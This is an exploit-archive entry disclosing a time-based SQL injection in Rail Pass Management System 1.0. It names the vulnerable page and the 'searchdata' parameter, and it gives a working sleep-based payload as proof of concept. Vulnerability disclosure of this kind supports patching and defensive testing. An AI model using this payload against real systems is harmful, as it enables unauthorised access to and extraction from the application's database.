Exploits / Vulnerability Discovered : 2024-02-09 |
Type : webapps |
Platform : php
This exploit / vulnerability Rail pass management system 1.0 timebased sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Rail Pass Management System - 'searchdata' Time-Based SQL Injection
# Date: 02/10/2023
# Exploit Author: Alperen Yozgat
# Vendor Homepage: https://phpgurukul.com/rail-pass-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17479
# Version: 1.0
# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30
## Description ##
On the download-pass.php page, the searchdata parameter in the search function is vulnerable to SQL injection vulnerability.
## Proof of Concept ##
# After sending the payload, the response time will increase to at least 5 seconds.
# Payload: 1'or+sleep(5)--+-